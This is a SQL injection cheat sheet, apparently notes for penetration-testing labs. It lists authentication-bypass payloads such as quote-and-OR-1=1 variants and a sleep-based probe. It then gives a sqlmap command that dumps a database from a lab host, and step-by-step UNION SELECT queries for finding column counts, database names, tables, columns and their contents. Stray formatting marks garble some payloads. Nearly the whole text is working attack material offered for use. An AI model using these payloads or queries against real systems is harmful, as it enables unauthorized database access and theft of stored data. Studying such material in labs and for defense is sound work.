"
'or 1=1
"or 1=1
or 1=1--
'or 1=1--
"or 1=1--
or 1=1#
'or 1=1#
"or
1=1#
or 1=1/*
'or 1=1/*
"or 1=1/*
or 1=1;%00
```
‘or 1=1;%00
“or 1=1;%00
‘or’
”`
'or
'or'–
```
‘or–
or a=a
”`
'or a=a
"or a=a
or a=a–
'or a=a —
```
“or a=a–
or ‘a’=‘a’
”`
'or 'a'='a'
"or 'a'='a'
')or('a'='a'
")”a”=”a”
')'a'='a
'or”='
1' or '1'='1
' or 'abc'='abc';--
' or ' '=' ';--
' or 1=1;--
If any of these allow you to create an always true statement, or produce an error, it’s vulnerable.
```1' sleep(10) ;--```
## Exploit
The easy way out is if you can use sqlmap:
```bash
# Read help
sqlmap help
# Example
sudo sqlmap -u "http://10.10.10.7/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
Otherwise, hopefully you can see some output from the injection test… if so, the follow steps get you to the W.
Inject union select NULL,NULL,... with more NULL statement until there is no error. The number of NULLs when there is no error, is the number of columns in the table.
Let n == Number of columns…
Inject union all select 1,2,n-1,@@version,n
Note: this may not be the vulnerable row! If this doesn’t work, and you have an error it should disclose the vulnerable column. If not, guess and check,
Inject union all select 1,2,n-1,database(),n
Note: this is DBMS dependant!
Inject union select 1,2,n-1,group_concat(table_name),n from information_schema.tables%20 where table_schema=database()
Any table/row name you inject, needs to be converted to a char string, use waraxe’s tool.
Inject union select 1,2,n-1,group_concat(column_name),n from information_schema.columns where table_name=CHAR(100,101,118,95,97,99,99,111,117,110,116,115)
Inject union select 1,2,n-1,group_concat(<rowname>,0x3a,<another_row_name>),n from <table_name>